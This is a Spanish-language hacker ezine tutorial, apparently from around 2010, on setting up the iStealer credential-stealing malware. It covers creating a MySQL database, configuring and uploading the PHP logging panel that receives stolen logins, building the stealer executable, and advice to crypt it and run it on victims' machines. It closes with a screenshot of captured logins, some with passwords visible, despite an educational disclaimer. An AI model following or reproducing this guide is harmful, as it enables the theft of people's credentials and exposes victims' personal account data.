# UNDERCODE



Terma Principal: Stealers



EZINE-DISEÑADO CREADO EXCLUSIVAMENTE PARA TALLERES DE ESTUDIO TODOS LOS DERECHOS RESERVADOS (UNDERCODE)

The state of the

2010 - 2011

DISEMADO POR MAZTOR

-----

# ¿Qué es y para qué sirve un Stealer?

Un stealer es un malware encargado de capturar y mostrar todos los logins almacenados en una PC.

La mayoría de los troyanos, tienen la opción de mostrar las contraseñas almacenadas, pero a lo largo de este tutorial, les mostrare las diferencias que hay entre capturarlas con un troyano y un stealer.

En la siguiente imagen les mostrare una captura de este excelente troyano que es el IndSocket RAT que trae incorporado la opción de mostrar los logins almacenados.



Como se puede ver, aparece el user y pass de un mail.

Entonces... Para que están los stealers, si con un troyano también podemos ver los logins...

La respuesta es simple, un troyano solo muestra las Pass de un solo remoto que nosotros seleccionemos, en cambio el stealer a demás de capturar logins de todo tipo, son mas ordenados. A demás de esto, los Stealers son mucho más completos, ya que capturan distintos tipos de pass de varias aplicaciones. El que les enseñare hoy día, captura una gran cantidad de pass. Los troyanos por lo general capturan pass de MSN, IE, Firefox entre otros. En cambio el que utilizaremos captura cantidad más notable que los troyanos:



Esto se debe a que los stealers solo están diseñados para sacar logins.

En esta entrega, les enseñare a montar un stealer que trabaja con base de datos SQL y que almacena, guarda y muestra de forma ordenada todos los logins capturados.

Antes de comenzar, quiero aclarar que no me hago responsable por el mal uso que se le pueda dar a esto.

Este material es expuesto para aprender el funcionamiento de un stealer. Lo que ustedes hagan con él, ya será bajo su responsabilidad.

## PARTE I

Lo que necesitaremos será un hosting con Cpanel y el Stealer. En esta entrega utilizare el iStealer.

Si el hosting es gratuito corremos el riesgo de que lo den de baja y perder todo.

Yo utilizare uno prestado, que será solo para testear el stealer y mostrarles su funcionamiento.

Vamos a nuestro Cpanel y crearemos una base de datos



Crear una Nueva Base de Datos

Nueva Base de datos: h4×	Or_testst Crear Base de Datos	
MySQL Base Crear Base de Dat Base de datos ana	s <b>de Datos</b> os MySQL dida <b>h4x0r_testst</b> .	
		[Regresar]

Bueno, ahí ya quedo nuestra base de datos creada.

Ahora lo que debemos hacer es crear un usuario para añadirlo a la base de datos

MySQL Usuarios añadir Nuevo Usuario		
Nombre Usuario:	stealer	0
	*Siete carácteres máximo	
Contraseña:	•••••	0
Contraseña (Otra vez):	•••••	
Strength (why?):	Fuerte (78/100)	Password Generator
	Crear Usuario	
MySQL Usuario Añadio usuario steale	s er con la contraseña ANTR:	AX-LABS.NET.
		[Regresar]

Bien, lo que sigue es vincular a ese usuario con la base de datos.

#### añadir Usuario a Base de Datos

Usuario:	h4x0r_stealer	•
Base de Datos:	h4x0r_testst	•
	Añadir	

## Ahora le aplicamos los permisos

🚕 MySQL Mantenimiento de Cuentas

#### Manejar los Privilegios del Usuario

Usuario: **h4x0r\_stealer** Base de Datos: **h4x0r\_testst** 

🖾 TODOS LOS PRIVILEGIOS				
SELECCIONAR	CREAR (CREATE)			
☑ INSERTAR (INSERT)	MODIFICAR (ALTERAR)			
☑ ACTUALIZAR (UPDATE)	☑ TIRAR (DROP)			
BORRAR (DELETE)	PONER SEGURO A LAS TABLAS (LOCK TABLES)			
☑ INDEX	☑ REFERENCIAS			
CREAR TABLAS TEMPORALES	CREAR ROUTINA			

Hacer Cambios

[Regresar]

👞 asístente de MySQL®

Usuario h4x0r\_stealer fue añadido a la base de datos h4x0r\_testst.

[Regresar]

Y listo!

Debemos recordar los datos de la base de datos, el usuario y la contraseña para poder configurar el Stealer.

Aca vemos como quedo finalizado:

h4x0r_testst	0.00 MB	h4x0r_stealer 🛞	Borrar Base de Datos

Como se puede ver, ahí esta la bd con el usuario vinculado

#### PARTE II

Lo que sigue es configurar el Stealer. Para ello vamos al directorio PHP Logger



Con algun editor de textos editamos el Index.php



Ahora podremos ver el código

```
1 <?php
         // CONFIGURATION ***************************
2
3
        $dbHost = "127.0.0.1"; // MySQL host
$dbUser = ""; // MySQL username
$dbPass = ""; // MySQL password
$dbDatabase = ""; // MySQL database name
4
5
 6
7
8
       $username = "admin"; // Login Username
$password = "admin"; // Login Password
9
10
11
        $7ogspage = 50;
                                        // Number of logs per page
12
13
         14
```

Reemplazamos por los datos nuestros

Comenzaremos desde la línea 4:

\$dbHost = "127.0.0.1"; // MySQL host

Modificamos y debe quedar asi:

\$dbHost = "localhost"; // MySQL host

Sigamos ahora a la siguiente línea, la 5 en donde deberemos colocar el usuario que creamos:

\$dbUser = ""; // MySQL username

Modificamos y debe quedar asi:

```
$dbUser = "h4x0r_stealer"; // MySQL username
```

Pasamos a la línea 6, que debemos colocar la Contraseña que le asignamos a dicho usuario:

\$dbPass = ""; // MySQL password

Modificamos y ponemos la pass

```
$dbPass = "ANTRAX-LABS.NET"; // MySQL password
```

Vamos a la línea 7, en donde colocaremos el nombre de la base de datos que creamos:

\$dbDatabase = ""; // MySQL database name

Debe quedar asi:

```
$dbDatabase = "h4x0r_testst"; // MySQL database name
```

Pasamos a la Linea 9, ya que la 8 esta vacia:

```
$username = "admin"; // Login Username
```

La modificamos, por el usuario que nosotros queramos:

```
$username = "ANTRAX"; // Login Username
```

Lo mismo hacemos en la línea 10, modificamos por una pass que queramos:

\$password = "root"; // Login Password

Aca les muestro una Captura de cómo quedo el mio terminado:

```
1
     <?php
         // CONFIGURATION *******************************
 2
 3
        $dbHost = "localhost"; // MySQL host
$dbUser = "h4xOr_stealer"; // MySQL username
$dbPass = "ANTRAX-LABS.NET"; // MySQL password
$dbDatabase = "h4xOr_testst"; // MySQL database name
 4
 5
 6
 7
 8
        $username = "ANTRAX"; // Login Username
$password = "root"; // Login Password
9
10
11
         $logspage = 50;
                                              // Number of logs per page
12
13
          14
```

Guardamos y listo!

## PARTE III

Lo que sigue es subir el index.php y la hoja de estilo por FTP a nuestro hosting.

💎 FlashFXP	
Sesión Servidores Opciones Cola de Espera Comandos Herrar	ientas Directorio Ver Ayuda
Navegador Local 🔋 🗋 👻 🌌 🕵	M 💉 🗙 💵 💄 - 🌌 🔂 🚱
📌 🌮 🚚 C:\Documents and Settings\Administrador\Mis docum 🖣	📩 📩 加 /public_html/test/
Nombre 🔺 Tam Modificado	Nombre 🔺 Tamaño Modificado Atributo
1. Directorio Padre	1. Directorio Padre
index.php 16 KB 09/10/2010 16:02	
style.css 1 KB 16/12/2009 2:53	
0 Carpetas, 2 Archivos, 2 Total, 2 Seleccionado (18 KB)	0 Carpetas, 0 Archivos, 0 Total (0 bytes)
C:\\Administrador\Mis documentos\iStealer_6.3_Legends\PHP Logg	r 206.51.232.10
Nombre	R] Listado Terminado: 113 bytes en 4,19 segundos (0,0 KB/s)
C:\Documents and Settings\Administrador\Mis documentos\iSte	[R] PASV a  [R] 227 Entering Passive Mode (206 51 232 10 209 132)
🛉 🖣 💀 C:\Documents and Settings\Administrador\Mis documentos\iSte	al [R] Abriendo la conexión de datos IP: 206,51,232,10,203,133).
	53637
4	[R] STOR index.php IR1150 Opening ASCII mode data compaction for index also
	I In 1100 Opening ASCH mode data connection for index.php
Enviando: inc. 16 KB (0,0 KB/s) 97% Transcurr	dos: 00:07 Restante: 00:00 Cola de espera: 00:01

Una vez que subió todo



Para evitar futuros inconvenientes, le daremos permisos 777 al index.php

in- Sl	Transferir Cola de Espera	Ctrl+T Ctrl+Q				
_	Transferir Como Guardar en la Cola de Espera Como					
-	Ver	Ctrl+V				
	Editar	Ctrl+E	I			
	Mover	Ctrl+M	I .			
	Eliminar	Del	I .			
	Renombrar	F2	I			
	Copiar URL	Ctrl+U	I			
	Atributos (CHMOD)	Ctrl+O	1			
	~ d		1			

	as		
Propietario —	Grupo	Público	
🔲 Definir UID	📃 Definir GID	Persistente	
🗹 Lectura	✓ Lectura	✓ Lectura	
🗹 Escritura	🗹 Escritura	🗹 Escritura	
🗹 Ejecución	🗹 Ejecución	🗹 Ejecución	

Ahora Entramos por la URL vía web y debería verse así:

/test/index.php		
🛛 🗋 Login	÷	
	Username:	ANTRAX
	Password:	••••
		Login

Ingresamos al panel:

Hello,	, ANTRAX				
	Show All Logs	Search	Export All Logs	Logout	
No logs f	found!				iStealer 6.1 Legends - Kizar Labs 2009

Si dice "No logs found!" quiere decir que hasta acá venimos todo perfecto.

De lo contrario mostrara errores en las tablas de base de datos o algún error de tipeo y deberemos revisar todos los datos que introducimos en el index.php

#### PARTE IV

Bueno, casi llegando al final, lo que nos queda es crear el Server del Stealer.

Abrimos el Builder del iStealer

iStealer 6.3 .egends.exe	iStealer 6.3 Legends
	Php Logger Options Url: /test/index.php
	Binder Options Bind with another file
	Path: File path Extraction:
	Icon Changer Options     Change the icon
	Path: File path
	Clone file version     Path: File path
	Build Test Url Options About

Colocamos la URL de donde tenemos el index.php y presionamos en el botón Test URL

Si es correcto, nos devolverá el siguiente mensaje:



Finalmente, creamos el Server dando click en Build.



Guardamos...



Hemos terminado!

Ahora solo queda encriptar nuestro server y pasarlo a algún remoto, o en donde lo deseen ejecutar.

Les enseñare una captura de cómo se ve un panel que ya ha capturado passwords:

Show All	Logs Search	Export All Logs	Logout			
<u>Program</u>	<u>Url / Host</u>		Login	Password	<u>Computer</u>	<u>Date</u>
CuteFtp	carrerae.escueladaritis	linet .	joanteroacco	Otilangostas		2010-10-09 11:04:07
CuteFtp						2010-10-09 11:04:07
CuteFtp	Spinstel below conta					2010-10-09 11:04:07
CuteFtp						2010-10-09 11:04:06
Firefox	http://www.facebook.c		mediaveronica@men.com			2010-10-09 11:04:06
Firefox						2010-10-09 11:04:06
MSN Messenger			josefinasantero@kotmail.com	075294		2010-10-09 11:04:05
MSN Messenger						2010-10-09 11:04:05
MSN Messenger			mediavarrorical@man.com			2010-10-09 11:04:05
Firefox						2010-10-08 17:56:21
MSN Messenger			river_femands@hotmail.com			2010-10-08 17:56:21
MSN Messenger						2010-10-08 17:56:21
MSN Messenger				processed001		2010-10-08 13:45:45

Espero que en esta entrega hayan aprendido lo que es un Stealer y su funcionamiento.

Este material no es expuesto para que todos roben pass, sino para que lo tengan en cuenta por si ven alguno de estos Stealers sueltos por ahí, y ser precavido para no ejecutarlo y caer en ellos.

Bueno, Como siempre agradezco a todos los lectores. También les agradezco enormemente a los que visitan mi blog, ya que me motivan a seguir escribiendo para ustedes.